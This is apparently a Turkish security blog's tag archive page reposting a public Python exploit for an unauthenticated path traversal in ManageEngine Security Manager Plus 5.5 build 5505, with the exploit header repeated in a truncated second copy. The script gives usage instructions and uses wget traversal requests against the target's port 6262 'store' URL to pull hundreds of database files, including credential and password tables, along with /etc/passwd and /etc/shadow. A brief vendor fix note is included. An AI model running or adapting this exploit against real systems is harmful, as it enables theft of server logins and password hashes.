Tag Archive for ManageEngine Security python exploit

ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal

ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal açığı bulunmuş olup açıkla ilgili python exploit aşağıdadır. Görüldüğü üzere bir takım tosyalar çekilebilmekte /etc/passwd, /etc/shadow/ dosyaları okunabilmektedir.

#!/usr/bin/python
#+——————————————————————————————————————————–+
# Exploit Title     : Security Manager Plus <= 5.5 build 5505 Path Traversal (Win+Linux)
# Date              : 18-10-2012
# Author            : xistence (xistence<[AT]>0x90.nl)
# Software link     : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.exe (Win)
# Software link     : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.zip (Linux)
# Vendor site       : http://www.manageengine.com/
# Version           : 5.5 build 5505 and lower
# Tested on         : CentOS 5.x + Windows XP/2008
#
# Vulnerability     : The Path Traversal is possible on the "store" url, without any authentication. This allows us to download the complete
#                     database and thus gather windows/linux logins which are used for patching the servers. It will also download the
#                     passwd and shadow files as Security Manager Plus runs with root/SYSTEM privileges. Modify it to make it work on windows,
#                     and grab SAM files or other files. NOTE: At least one patch must have been downloaded in Security Manager Plus already.
#
# Fix:
# 1. Go to SMP server system and stop SMP service.
# 2. Download the SMP_Vul_fix.zip file from : http://bonitas.zohocorp.com/4264259/scanfi/31May2012/SMP_Vul_fix.zip
# 3. Extract the downloaded file which contains four files : AdvPMServer.jar, AdvPMClient.jar, scanfi.jar and AdventNetPMUnixAgent.jar
# 3. Copy the extracted .jar files to <SMP-HOME>\lib directory (e.g., C:\AdventNet\SecurityManager\lib). [Overwrite the existing jar files and do not rename them]
# 4. Start the SMP service.
#+——————————————————————————————————————————–+

import os, sys

if (len(sys.argv) != 2):
    print ""
    print "[*] Security Manager Plus Path Traversal Exploit – xistence (xistence<[at]>0x90.nl) – 2012-05-29"
    print ""
    print "[*] Usage: secman-path.py <RHOST>"
    print "[*] I.e.:  ./secman-path.py www.manageengine.com"
    print "[*]"
    print "[*] RHOST = Remote Host which runs Security Manager Plus"
    print ""
    print ""
    exit(0)

rhost = sys.argv[1]


dbFiles = [‘StatusPropagateCriteria.frm’, ‘UserPatchComment.frm’, ‘I18nLanguageCountry.frm’, ‘Udef_Class_Range.frm’, ‘AaaUserContactInfo.frm’, ‘JoinTable.frm’, ‘GlobalCredential.frm’, ‘PMWinOS.frm’, ‘SysDetails.frm’, ‘AaaRole.frm’, ‘Time_Expressions.frm’, ‘DCSupportedApplications.frm’, ‘ACSQLString.frm’, ‘DeviceInventoryItems.frm’, ‘ACFeedBackProperties.frm’, ‘AaaPasswordHint.frm’, ‘AllowedValues.frm’, ‘Integral_Agg_Vars.frm’, ‘ACCountSQLString.frm’, ‘AaaServicePasswordRule.frm’, ‘ACCacheConfig.frm’, ‘AaaOrgDetail.frm’, ‘Array_List.frm’, ‘ViewCustomizer.frm’, ‘DeviceAuditInfo.frm’, ‘AaaAccountOwner.frm’, ‘DeviceToServicePack.frm’, ‘MSPMDependencyServicePack.frm’, ‘NENetwork.frm’, ‘ACUserFilterGroup.frm’, ‘WeeklyVulnID.frm’, ‘RegistryChanges.frm’, ‘PMPatchType.frm’, ‘NetworkTopology.frm’, ‘VulnerabilityScanDetails.frm’, ‘AaaAccSessionProp.frm’, ‘Int_Expr_To_Int.frm’, ‘JoinRelCriteria.frm’, ‘AaaModuleService.frm’, ‘ClientServiceProviders.frm’, ‘PCIQuery.frm’, ‘Upd_Row_Task_Template.frm’, ‘JoinCriteria.frm’, ‘LinuxAppGroup.frm’, ‘Start_End_Count.frm’, ‘OpenPorts.frm’, ‘DevicePatchTaskInput.frm’, ‘Free5IPs.frm’, ‘Int_DataObj_Expr.frm’, ‘Pattern_Variables.frm’, ‘DevicePatchStatusAuditInfo.frm’, ‘Email_Message.frm’, ‘TestReport.frm’, ‘ACLink.frm’, ‘Decimal_DataObj_Vars.frm’, ‘IPInterfaceNetwork.frm’, ‘ACUserClientState.frm’, ‘ScanPolicy.frm’, ‘OfficeMediaLocation.frm’, ‘ServicePackStoreAuditInfo.frm’, ‘PMScanVulDetails.frm’, ‘Iter_DataObj_Task.frm’, ‘PatchGroup.frm’, ‘Bool_Str_Dataobj_Expr.frm’, ‘OracleErrorCode.frm’, ‘SystemInfo.frm’, ‘Upd_DataObj_Var_Task.frm’, ‘BulletinDatastore.frm’, ‘SmtpConfiguration.frm’, ‘AaaOrgUser.frm’, ‘PMScheduledTaskDetails.frm’, ‘AaaOrgPostalAddr.frm’, ‘User_Def_Char_Class.frm’, ‘FileHandler.frm’, ‘AaaService.frm’, ‘ACAjaxFormOption.frm’, ‘ScheduleScanTaskInput.frm’, ‘ColumnDetails.frm’, ‘Boolean_Variables.frm’, ‘ACElement.frm’, ‘ACViewToGroupMapping.frm’, ‘DeviceToPatch.frm’, ‘Int_Const_Opr_Expr.frm’, ‘AaaPamModuleOption.frm’, ‘GroupVulnerabilities.frm’, ‘Pattern_Expressions.frm’, ‘GroupCompNotification.frm’, ‘MSCommand.frm’, ‘ACContextHelp.frm’, ‘Rules_To_Statements.frm’, ‘String_Matcher_Group.frm’, ‘DeviceToMSSoftware.frm’, ‘Task_Owner.frm’, ‘AaaMethodParams.frm’, ‘IPv4Address.frm’, ‘I18nLocalMsg.frm’, ‘Theme.frm’, ‘Repair.frm’, ‘Num_Const_Opr_Expr.frm’, ‘ACParams.frm’, ‘AaaTableUpdatePermission.frm’, ‘PatchDetectionCheck.frm’, ‘Templates_To_Relvars.frm’, ‘WindowsUsers.frm’, ‘MSRegChg.frm’, ‘NetworkDomainInfo.frm’, ‘ActiveDirectoryInfo.frm’, ‘Udef_Expr_Opr_Expr.frm’, ‘ScheduledReports.frm’, ‘UpdateDefinition.frm’, ‘GroupTicNotification.frm’, ‘ResourceFalsePositiveVulns.frm’, ‘FolderChanges.frm’, ‘WebViewConfig.frm’, ‘PMOfficeEditionType.frm’, ‘ACClientProps.frm’, ‘ACFilterConfigList.frm’, ‘EPMTaskInput.frm’, ‘AdditionalViewParams.frm’, ‘Quotation.frm’, ‘Str_Expr_To_Str.frm’, ‘bla.py’, ‘Network.frm’, ‘WindowsGroups.frm’, ‘ACTableFilterListRel.frm’, ‘PMTaskDetails.frm’, ‘LatestResourceScans.frm’, ‘Loop_Task_Template.frm’, ‘YSeriesColumn.frm’, ‘AaaAccOldPassword.frm’, ‘ConstituentTable.frm’, ‘FalsePositiveTestCase.frm’, ‘AaaOrganization.frm’, ‘PatchStoreLocation.frm’, ‘Print_Log_RelVars.frm’, ‘DeviceTaskInput.frm’, ‘PdfViewConfig.frm’, ‘Rules.frm’, ‘ProductDetectionCheck.frm’, ‘TreeQuery.frm’, ‘WebUIComponent.frm’, ‘AaaAce.frm’, ‘Pointers_In_Path.frm’, ‘NetworkDnsInfo.frm’, ‘LinuxPackageDependency.frm’, ‘UserNamePassword.frm’, ‘ManagedResource.frm’, ‘ProfileGroupMap.frm’, ‘ScanAddressGroup.frm’, ‘Default_Task_Conf.frm’, ‘AaaAccBadLoginStatus.frm’, ‘Pattern_Template_Vars.frm’, ‘PatchApplicableDetails.frm’, ‘NEComponent.frm’, ‘FKColumnDefinition.frm’, ‘Str_Deriv_Int_Vars.frm’, ‘Par_Char_Class_Expr.frm’, ‘Bool_Num_Comp_Decimal.frm’, ‘PatchDependencyCheck.frm’, ‘Logger.frm’, ‘Email_CC_Address.frm’, ‘MSAffectedServicePack.frm’, ‘AaaUserStatus.frm’, ‘DownloadFiles.frm’, ‘AuditSeverityLevel.frm’, ‘JavaScriptAction.frm’, ‘HTTPDirList.frm’, ‘AaaOrgStatus.frm’, ‘Templates.frm’, ‘OSLanguage.frm’, ‘TablesInTree.frm’, ‘TestCasePattern.frm’, ‘ValidationFiles.frm’, ‘ReverseDNSEntries.frm’, ‘CC_Address.frm’, ‘PortGroup.frm’, ‘DeviceConfigTaskInput.frm’, ‘Time_Operator_Delta.frm’, ‘AuditLevel.frm’, ‘AdventNetErrorCode.frm’, ‘AaaUserTwoFactorDetails.frm’, ‘PMSystemConfig.frm’, ‘TableDSMap.frm’, ‘DeviceToInventory.frm’, ‘PatchDetails.frm’, ‘VulnerabilityReference.frm’, ‘AaaLogin.frm’, ‘ModuleContext.frm’, ‘AuditResultProperty.frm’, ‘MSFile.frm’, ‘PatchGroupTaskInput.frm’, ‘Handler.frm’, ‘Numeric_Expressions.frm’, ‘Module.frm’, ‘DeviceConfigAuditInfo.frm’, ‘Cr_DataObj_Task.frm’, ‘PersonalizedViewMap.frm’, ‘ACPageLengthConfig.frm’, ‘ResourceScanStatus.frm’, ‘Decimal_Variables.frm’, ‘AaaAccSession.frm’, ‘PersonalityConfiguration.frm’, ‘Bool_Str_Comp_Str.frm’, ‘MemoryInfo.frm’, ‘AaaPasswordRule.frm’, ‘Workflow_Templates.frm’, ‘String_DataObj_Vars.frm’, ‘DefaultTheme.frm’, ‘FolderBaseline.frm’, ‘RemoteCommands.frm’, ‘IPv6Address.frm’, ‘AaaRoleCategory.frm’, ‘Ext_Task_Api_Loc.frm’, ‘ModeSpecificServiceProviders.frm’, ‘TestCaseCGIScript.frm’, ‘SystemTemplateHandler.frm’, ‘I18nCurrentVersion.frm’, ‘Expressions.frm’, ‘MSRegKey.frm’, ‘DeviceConfig.frm’, ‘Inner_Join.frm’, ‘Address.frm’, ‘UsbInfo.frm’, ‘IPNetwork.frm’, ‘DiscoveredDomains.frm’, ‘ResourceRegValues.frm’, ‘Projection_Operator.frm’, ‘Udef_Char_Cls_Expr.frm’, ‘Integral_Variables.frm’, ‘To_Address.frm’, ‘Decimal_Obj_Expr.frm’, ‘Numeric_Rank_Vars.frm’, ‘ServerDetails.frm’, ‘WF_Task_Variables.frm’, ‘AuditRecord.frm’, ‘Menu.frm’, ‘UserPreferences.frm’, ‘OmitForScan.frm’, ‘ConfFile.frm’, ‘ProfileResourceMap.frm’, ‘AaaUserConfigRecord.frm’, ‘Pattern_DataObj_Vars.frm’, ‘Concat_Task_Template.frm’, ‘DeviceInfo.frm’, ‘MSPatch.frm’, ‘Bool_Num_Comp_Const.frm’, ‘Template_Constants.frm’, ‘While_Loop_Tasks.frm’, ‘Task_Input.frm’, ‘SelectTable.frm’, ‘MSServicePack.frm’, ‘Workflow_Instances.frm’, ‘WorkEngine_Config.frm’, ‘SingleTestCaseExecutor.frm’, ‘PMScheduledJob.frm’, ‘ACTabChildConfig.frm’, ‘NewLinuxAdvisory.frm’, ‘AaaAuthorizedRole.frm’, ‘Instances.frm’, ‘Subject_Keys.frm’, ‘Boundary_Matchers.frm’, ‘AaaPamModule.frm’, ‘AuditResourceProp.frm’, ‘WMITestCasePattern.frm’, ‘IndexDefinition.frm’, ‘Views_PIDX.frm’, ‘Selection_Operator.frm’, ‘CmdFilesToPush.frm’, ‘PKDefinition.frm’, ‘PMSPPushCounter.frm’, ‘ServiceBanner.frm’, ‘AaaAccHttpSession.frm’, ‘AaaTablePermission.frm’, ‘AllowedPattern.frm’, ‘LinuxExtPackage.frm’, ‘Workflow_Statements.frm’, ‘UniqueKeyDefinition.frm’, ‘Working_Hours.frm’, ‘DeviceToPackageList.frm’, ‘Architecture.frm’, ‘PMDeviceToSPInfo.frm’, ‘ChangeMonitorTasks.frm’, ‘AaaTableReadPermission.frm’, ‘NegateResult.frm’, ‘ViewConfiguration.frm’, ‘CustomViewServiceProviders.frm’, ‘Decimal_Agg_Vars.frm’, ‘KeyboardInfo.frm’, ‘Time_Template_Vars.frm’, ‘Task_Conf.frm’, ‘PMEntryPerPage.frm’, ‘DriveInfo.frm’, ‘Vulnerability.frm’, ‘Criteria.frm’, ‘AffectedProduct.frm’, ‘TestCaseCommands.frm’, ‘Reg_Expr_Split_List.frm’, ‘ACPSConfiguration.frm’, ‘Relations_In_Path.frm’, ‘FileCheckDetail.frm’, ‘PortGroupRange.frm’, ‘DeviceToPatchStatus.frm’, ‘AaaAccSessionAudit.frm’, ‘SeverityNode.frm’, ‘Message_Keys.frm’, ‘Decimal_DataObj_Expr.frm’, ‘ACElementAttr.frm’, ‘ProcessorInfo.frm’, ‘Template_Variables.frm’, ‘Relations.frm’, ‘AaaEnvironmentEntry.frm’, ‘AaaAccOwnerProfile.frm’, ‘AaaPostalAddress.frm’, ‘NewPatchInfo.frm’, ‘Replace_Reg_Expr_Str.frm’, ‘ACJSOption.frm’, ‘Int_Obj_Expr.frm’, ‘Mail_Server.frm’, ‘TestCaseHTTPURLCheck.frm’, ‘TestCase.frm’, ‘SelectSQLString.frm’, ‘NetworkElement.frm’, ‘AaaImpliedByTableColumn.frm’, ‘IPInterface.frm’, ‘PMMessage.frm’, ‘Update_Index_Vars.frm’, ‘UINavigationConfig.frm’, ‘Workflow_Unit_PIDX.frm’, ‘VulnerabilityCategory.frm’, ‘String_Template_Vars.frm’, ‘DataSource.frm’, ‘PMSPLocationExtn.frm’, ‘ConstraintDefinition.frm’, ‘Fk_Paths.frm’, ‘TemplateFiles.frm’, ‘I18nUserTranslatorMap.frm’, ‘Boolean_Template_Vars.frm’, ‘ACFilterConfig.frm’, ‘TmpViewCriteria.frm’, ‘Rename_Operator.frm’, ‘PdfUIComponent.frm’, ‘Str_Expr_Opr_Expr.frm’, ‘Error_Data.frm’, ‘ACFilterGroup.frm’, ‘MSFileChg.frm’, ‘MSBulletinComment.frm’, ‘Scheduled_Task.frm’, ‘ScheduledScan.frm’, ‘Schedule.frm’, ‘Boolean_Constants.frm’, ‘ReportTemplate.frm’, ‘ACCriteria.frm’, ‘DominantTableConfig.frm’, ‘AuditNotifyCriteria.frm’, ‘BulkTestCases.frm’, ‘PMTaskScanMapper.frm’, ‘Attachment_Input.frm’, ‘I18nPublicLocalMsg.frm’, ‘Pre_Def_Char_Class.frm’, ‘I18nVersion.frm’, ‘DeviceInventoryTypes.frm’, ‘Configuration.frm’, ‘MSRegChange.frm’, ‘SelectQuery.frm’, ‘LinuxPatchDependency.frm’, ‘AAARadiusConfig.frm’, ‘Num_Decimal_Opr_Expr.frm’, ‘DiscoveredHosts.frm’, ‘Str_DataObj_Expr.frm’, ‘Instance_Data.frm’, ‘ACTableViewConfig.frm’, ‘LinuxCheckDetail.frm’, ‘OpenViewInContentArea.frm’, ‘CiscoTestCasePattern.frm’, ‘Group_Templates.frm’, ‘Bool_Num_Dataobj_Expr.frm’, ‘ResourceWMITestResults.frm’, ‘MemoryModuleInfo.frm’, ‘ServiceVulnerability.frm’, ‘MSBulletin.frm’, ‘Num_Expr_Opr_Decimal.frm’, ‘Boolean_DataObj_Vars.frm’, ‘ACTableLayoutChildConfig.frm’, ‘Bool_Expr_Terms.frm’, ‘DefService.frm’, ‘AIPLocation.frm’, ‘ACNavigationConfiguration.frm’, ‘Tasks_To_Exceptions.frm’, ‘MSSupercededBulletin.frm’, ‘ViewConfiguration_PIDX.frm’, ‘I18nTranslator.frm’, ‘Proj_Opr_Output.frm’, ‘PortGroupPorts.frm’, ‘ResourceSch.frm’, ‘PatchDeployDependency.frm’, ‘DataObj_Variables.frm’, ‘Product.frm’, ‘UIComponent_PIDX.frm’, ‘Time_Constants.frm’, ‘Update_Template_Vars.frm’, ‘BulkTestCaseExecutor.frm’, ‘AddressGroupRange.frm’, ‘VulnerabilityGroup.frm’, ‘Commit_DataObj_Task.frm’, ‘MSAvailableSP.frm’, ‘ReportServiceFilter.frm’, ‘NEInterfaceDetails.frm’, ‘ResourceSoftwareList.frm’, ‘ACGridLayoutChildConfig.frm’, ‘Str_Obj_Expr.frm’, ‘ChartProperty.frm’, ‘FKDefinition.frm’, ‘AaaContactInfo.frm’, ‘ACLinkParams.frm’, ‘ACPanelElement.frm’, ‘Int_Expr_Opr_Const.frm’, ‘Bool_Composed_Expr.frm’, ‘TableDetails.frm’, ‘DeviceRebootStatus.frm’, ‘ReportType.frm’, ‘Bool_Time_Comp_Time.frm’, ‘AxisColumn.frm’, ‘AdvisoryPatchDependency.frm’, ‘TmpColumnRenderer.frm’, ‘ResourceConfiguration.frm’, ‘AaaAccount.frm’, ‘Out_Var_Instances.frm’, ‘MSPMRegChange.frm’, ‘DeviceToScanInfo.frm’, ‘RelationalCriteria.frm’, ‘ChartPropKey.frm’, ‘MSProductFamily.frm’, ‘TypeMatchCriteria.frm’, ‘Message_Templates.frm’, ‘LatestCompletedAGScans.frm’, ‘Checks.frm’, ‘I18nMessage.frm’, ‘WebMenuItem.frm’, ‘ACFormConfig.frm’, ‘Iter_Table_Task.frm’, ‘DeviceOfficeEditionType.frm’, ‘ScheduledTask_Retry.frm’, ‘Integral_Row_Count.frm’, ‘Bulletin.frm’, ‘ViewDataTableMapping.frm’, ‘MenuAndMenuItem.frm’, ‘PMPatchEXTNMaster.frm’, ‘FeatureParams.frm’, ‘Template_Data.frm’, ‘Workflow_Task.frm’, ‘Bool_Time_Comp_Const.frm’, ‘Workflow_Template_Task.frm’, ‘Print_Log_Expr.frm’, ‘AaaMethodPermission.frm’, ‘Num_Expr_Opr_Const.frm’, ‘SeqGenState.frm’, ‘ScanJobMapper.frm’, ‘ServerStatus.frm’, ‘DeviceCredential.frm’, ‘Relvars_To_Views.frm’, ‘Group_Count.frm’, ‘TCRegistryValueCheck.frm’, ‘PMDeviceToPatch.frm’, ‘DeviceGlobalCredential.frm’, ‘Default_Task_Input.frm’, ‘MSPatchComment.frm’, ‘ServerServiceProviders.frm’, ‘Inner_Join_Attribs.frm’, ‘ThreadPool.frm’, ‘Print_Log.frm’, ‘AaaPermission.frm’, ‘ScanInputsForDisplay.frm’, ‘ACFunctionColumns.frm’, ‘LinuxAdvisory.frm’, ‘MySQLErrorCode.frm’, ‘Exceptions.frm’, ‘SystemUserComment.frm’, ‘String_List.frm’, ‘NetworkInfo.frm’, ‘DeviceToLinuxOS.frm’, ‘AssetGroupCred.frm’, ‘MonitorInfo.frm’, ‘Fk_Pointers.frm’, ‘ACStringConstant.frm’, ‘MSProductFamilyDetail.frm’, ‘String_Variables.frm’, ‘CrackedUserNamePassword.frm’, ‘Coll_Iterat_Template.frm’, ‘TmpViewDetails.frm’, ‘AaaAccPassword.frm’, ‘HardDiskInfo.frm’, ‘ACColumnConfiguration.frm’, ‘Relvars.frm’, ‘ChartPropertySet.frm’, ‘Periodic.frm’, ‘LinuxPatch.frm’, ‘Email_Task_Input.frm’, ‘ServicePackTaskInput.frm’, ‘Resource_Location.frm’, ‘MSSQLCheckQuery.frm’, ‘TCHTTPFileGrep.frm’, ‘Email_To_Address.frm’, ‘AaaUserProperty.frm’, ‘ScanVulnGroup.frm’, ‘UIComponent.frm’, ‘InventoryHardware.frm’, ‘ACFilterList.frm’, ‘Schedule_View.frm’, ‘ManagedStateHolder.frm’, ‘Paths.frm’, ‘WmiErrorCode.frm’, ‘Trans_Closure_Attributes.frm’, ‘PMScanInfo.frm’, ‘SPDeployDependency.frm’, ‘AuditOperProperty.frm’, ‘Simple_Class_Expr.frm’, ‘ChartViewConfig.frm’, ‘Decimal_Expr_To_Dc.frm’, ‘AuditUserProperty.frm’, ‘BeanInterceptor.frm’, ‘DeviceRebootPending.frm’, ‘DataObj_Var_Tables.frm’, ‘MonitorProfiles.frm’, ‘AddressGroup.frm’, ‘PMPatchPushCounter.frm’, ‘ACColumnConfigurationList.frm’, ‘Pointer_Fk_Attributes.frm’, ‘MSSoftwareCheck.frm’, ‘Schedule_Audit.frm’, ‘NEInterface.frm’, ‘Integral_Template_Vars.frm’, ‘ACDropDown.frm’, ‘MouseInfo.frm’, ‘OperationAuditRecord.frm’, ‘Cr_Row_Task_Template.frm’, ‘Inner_Join_Tables.frm’, ‘DeviceGroup.frm’, ‘Forward.frm’, ‘ResourceDeviceMapper.frm’, ‘ACAjaxForm.frm’, ‘I18nVersionMessage.frm’, ‘Location.frm’, ‘Str_Const_Opr_Expr.frm’, ‘Resources_PIDX.frm’, ‘AntiVirusInfo.frm’, ‘UnavailableHosts.frm’, ‘TestCaseVulnerability.frm’, ‘AaaPamConf.frm’, ‘ReportMailSettings.frm’, ‘BeanProperties.frm’, ‘MSComment.frm’, ‘Pattern_To_Str_Expr.frm’, ‘ObjectIdentifierColumns.frm’, ‘ACDropDownParams.frm’, ‘AuditTableConfig.frm’, ‘OfficeDeploymentPolicy.frm’, ‘ScanInputs.frm’, ‘ACAjaxOptions.frm’, ‘FileChanges.frm’, ‘TableViewSortColumn.frm’, ‘Bool_Decimal_Dataobj_Expr.frm’, ‘I18nCreatedBy.frm’, ‘Time_Expr_To_Time.frm’, ‘ACEmailAddress.frm’, ‘PMMSServicePackInfo.frm’, ‘ScanRange.frm’, ‘Print_Task_Relvar.frm’, ‘ProfileMonitorMap.frm’, ‘Print_Task.frm’, ‘String_Expressions.frm’, ‘AaaDisableAuth.frm’, ‘PatchGroupResourceMap.frm’, ‘db.opt’, ‘DeviceSPStatusAuditInfo.frm’, ‘ACIntegerConstant.frm’, ‘AddressGroupHosts.frm’, ‘TaskEngine_Task.frm’, ‘ACTemplateHandler.frm’, ‘InventoryService.frm’, ‘StatusUpdateCriteria.frm’, ‘SelectColumn.frm’, ‘CVEDetail.frm’, ‘RemReportConf.frm’, ‘Parent_Class_Expr.frm’, ‘Relvars_To_Tables.frm’, ‘DeviceToGroup.frm’, ‘SoftwareList.frm’, ‘ProxyConfiguration.frm’, ‘Boolean_Expressions.frm’, ‘PatchSeverityImage.frm’, ‘DeviceGroupTaskInput.frm’, ‘ApplicationVulnerability.frm’, ‘MSPMInstallSequence.frm’, ‘SQinTreeQuery.frm’, ‘PMAlternateLocation.frm’, ‘MSFileChange.frm’, ‘Quantifier_Operator.frm’, ‘Time_Variables.frm’, ‘AlarmStateHolder.frm’, ‘WMITestCaseExpression.frm’, ‘DiscoveryJobs.frm’, ‘AaaOrgContactUser.frm’, ‘Udef_Char_Cls_Const.frm’, ‘ResourceDisplayMapper.frm’, ‘AddressGroupResources.frm’, ‘Task_Templates.frm’, ‘Time_DataObj_Vars.frm’, ‘MSProduct.frm’, ‘Integral_Expressions.frm’, ‘ACFtpDetails.frm’, ‘PackageStoreLocation.frm’, ‘ThemeAttributesMapping.frm’, ‘Out_Template_Vars.frm’, ‘RegkeyCheckDetail.frm’, ‘ACInstantFeedBack.frm’, ‘Integral_DataObj_Vars.frm’, ‘Composite.frm’, ‘AaaOrgContactInfo.frm’, ‘Statements.frm’, ‘MenuItem.frm’, ‘Num_Expr_Opr_Expr.frm’, ‘PMPatchLocationExtn.frm’, ‘Bool_Exists_Var.frm’, ‘ServicePackStoreLocation.frm’, ‘DeviceToPackageStatus.frm’, ‘ACMailConfig.frm’, ‘ScanTicNotification.frm’, ‘Bool_Neg_Expr.frm’, ‘MSMapping.frm’, ‘ReportRiskFilter.frm’, ‘TCServiceDependency.frm’, ‘Decimal_Template_Vars.frm’, ‘Attachment.frm’, ‘PMRegkeyCheckDetail.frm’, ‘AaaImpliedTableColumn.frm’, ‘TreeIdentifierColumns.frm’, ‘PatchStoreConfiguration.frm’, ‘ScanPortGroup.frm’, ‘NVaxApplication.frm’, ‘Bean.frm’, ‘Trans_Closure_Weights.frm’, ‘PMFileCheckDetail.frm’, ‘JoinColumns.frm’, ‘Iterat_Task_Template.frm’, ‘Discovery.frm’, ‘RangeValues.frm’, ‘OperatingSystem.frm’, ‘Email_Attachments.frm’, ‘Service.frm’, ‘DBAdapter.frm’, ‘PMProductFamily.frm’, ‘NotificationCriteria.frm’, ‘Pattern_To_Char_Expr.frm’, ‘AaaGenderHonorific.frm’, ‘Action.frm’, ‘ACRelationalCriteria.frm’, ‘PgSQLErrorCode.frm’, ‘PMPatchLocation.frm’, ‘Custom_Bool_Expr.frm’, ‘AaaTableAccessSPI.frm’, ‘AaaImpliedPermission.frm’, ‘Resources.frm’, ‘Patch.frm’, ‘MultiMediaInfo.frm’, ‘MSSupercededBy.frm’, ‘TableTemplateFiles.frm’, ‘SNMPCommunity.frm’, ‘PrinterInfo.frm’, ‘OSDisplayDetails.frm’, ‘UVHValues.frm’, ‘PatchGroupToAddressGroupMap.frm’, ‘TCsAfterPatchDetection.frm’, ‘Boolean_Reg_Expr.frm’, ‘Task_Instances.frm’, ‘DeviceProtocol.frm’, ‘AaaUserProfile.frm’, ‘ScanCompNotification.frm’, ‘Bool_Const_Comp_Str.frm’, ‘ServiceProperties.frm’, ‘TreeDefinition.frm’, ‘Bool_Set_Comp_Var.frm’, ‘Int_Expr_Opr_Expr.frm’, ‘TiledView.frm’, ‘Quantifier.frm’, ‘ResourceCompNotification.frm’, ‘TemplateViewParams.frm’, ‘ScanPMTaskMapper.frm’, ‘AaaRoleToCategory.frm’, ‘MsSQLErrorCode.frm’, ‘WMITestCaseCommands.frm’, ‘FalsePositiveVulns.frm’, ‘MSQNumber.frm’, ‘DiscoveryToResourceMapping.frm’, ‘AaaAccountStatus.frm’, ‘Time_Agg_Vars.frm’, ‘ACCVTabParentConfig.frm’, ‘AaaPasswordProfile.frm’, ‘ReportCategoryFilter.frm’, ‘Quantifier_Range.frm’, ‘AaaUserPostalAddr.frm’, ‘CustomHandler.frm’, ‘FileBaseline.frm’, ‘AuditConfig.frm’, ‘ResourceVulnerabilityDetails.frm’, ‘AaaAccAdminProfile.frm’, ‘PMSPLocation.frm’, ‘Trans_Closure_Operator.frm’, ‘ResourceTicNotification.frm’, ‘Bool_Str_Comp_Const.frm’, ‘Bool_Expr_With_Terms.frm’, ‘Java_Api.frm’, ‘SortColumn.frm’, ‘AaaTrustedRole.frm’, ‘C_Task_Apis.frm’, ‘PatchToGroup.frm’, ‘ScanStatus.frm’, ‘Calendar_Periodicity.frm’, ‘PhysicalDriveInfo.frm’, ‘AaaAccUserProfile.frm’, ‘ACGroupByColumns.frm’, ‘SoundCardInfo.frm’, ‘AuditConfigProperty.frm’, ‘ReportSeverityFilter.frm’, ‘ScanJobResources.frm’, ‘Str_Expr_Opr_Const.frm’, ‘Views.frm’, ‘ACUserPreference.frm’, ‘Trans_Closure_Weight_Expr.frm’, ‘PackageList.frm’, ‘I18nCurrUserLocale.frm’, ‘AaaPasswordStatus.frm’, ‘UpdateDeleteRows.frm’, ‘Calendar.frm’, ‘AaaSimplePermission.frm’, ‘CrackedSNMPCommunity.frm’, ‘DataObj_Var_Columns.frm’, ‘MSSeverity.frm’, ‘ACRendererConfiguration.frm’, ‘ACTableColumns.frm’, ‘PortInfo.frm’, ‘ExeReportConf.frm’, ‘Class_Expr_Opr_Expr.frm’, ‘Concat_Task_List.frm’, ‘AaaImpliedRole.frm’, ‘Expressions_PIDX.frm’, ‘RiskFactor.frm’, ‘ResourceCred.frm’, ‘TestCaseHTTPDir.frm’, ‘CustomViewConfiguration.frm’, ‘CredentialDescription.frm’, ‘RemoteTCExpression.frm’, ‘RepairReport.frm’, ‘Bool_Expr_Comp_Expr.frm’, ‘PatchTaskInput.frm’, ‘MSSupercededPatch.frm’, ‘ACClientEncProps.frm’, ‘I18nLocale.frm’, ‘ConfFileToModule.frm’, ‘Decimal_Expressions.frm’, ‘Print_Task_Expr.frm’, ‘Workflow_Unit.frm’, ‘ResourceApplication.frm’, ‘Email_Task.frm’, ‘VulnerabilityScan.frm’, ‘ACGridLayoutConfig.frm’, ‘AaaPassword.frm’, ‘AaaRoleOwner.frm’, ‘ACPSConfigList.frm’, ‘Del_Row_Task_Template.frm’, ‘AaaUser.frm’, ‘RebootPolicy.frm’, ‘TreeQueryIdentifierColumns.frm’, ‘WindowsServices.frm’, ‘ACFilter.frm’, ‘PatchStoreAuditInfo.frm’, ‘SB_Applications.frm’, ‘OperationType.frm’, ‘LatestResourceScanStatus.frm’, ‘MSPMFileChange.frm’, ‘LatestAGScans.frm’, ‘RegistryBaseline.frm’, ‘BookMark.frm’, ‘TmpViewColumn.frm’, ‘Char_Class_Expr.frm’, ‘WorkFlow_Type.frm’, ‘ScanVulnerabilityDetails.frm’, ‘ScanHosts.frm’]

for blah in dbFiles:
        print "[*] Downloading file: " + blah
        os.system("wget -q http://%s:6262/store?f=../mysql/data/securitymanager/%s -O %s" % (rhost, blah, blah))

os.system("wget http://%s:6262/store?f=../../../../../etc/passwd -O passwd" % rhost)
os.system("wget http://%s:6262/store?f=../../../../../etc/shadow -O shadow" % rhost)

ManageEngine Security Manager Plus

ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal açığı bulunmuş olup açıkla ilgili python exploit aşağıdadır. Görüldüğü üzere bir takım tosyalar çekilebilmekte /etc/passwd, /etc/shadow/ dosyaları okunabilmektedir.

#!/usr/bin/python
#+——————————————————————————————————————————–+
# Exploit Title     : Security Manager Plus <= 5.5 build 5505 Path Traversal (Win+Linux)
# Date              : 18-10-2012
# Author            : xistence (xistence<[AT]>0x90.nl)
# Software link     : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.exe (Win)
# Software link     : http://www.manageengine.com/products/security-manager/81779457/ManageEngine_SecurityManager_Plus.zip (Linux)
# Vendor site       : http://www.manageengine.com/
# Version           : 5.5 build 5505 and lower
# Tested on         : CentOS 5.x + Windows XP/2008
#
# Vulnerability     : The Path Traversal is possible on the "store" url, without any authentication. This allows us to download the complete
#                     database and thus gather windows/linux logins which are used for patching the servers. It will also download the
#                     passwd and shadow files as Security Manager Plus runs with root/SYSTEM privileges. Modify it to make it work on windows,
#                     and grab SAM files or other files. NOTE: At least one patch must have been downloaded in Security Manager Plus already.
#
# Fix:
# 1. Go to SMP server system and stop SMP service.
# 2. Download the SMP_Vul_fix.zip file from : http://bonitas.zohocorp.com/4264259/scanfi/31May2012/SMP_Vul_fix.zip
# 3. Extract the downloaded file which contains four files : AdvPMServer.jar, AdvPMClient.jar, scanfi.jar and AdventNetPMUnixAgent.jar
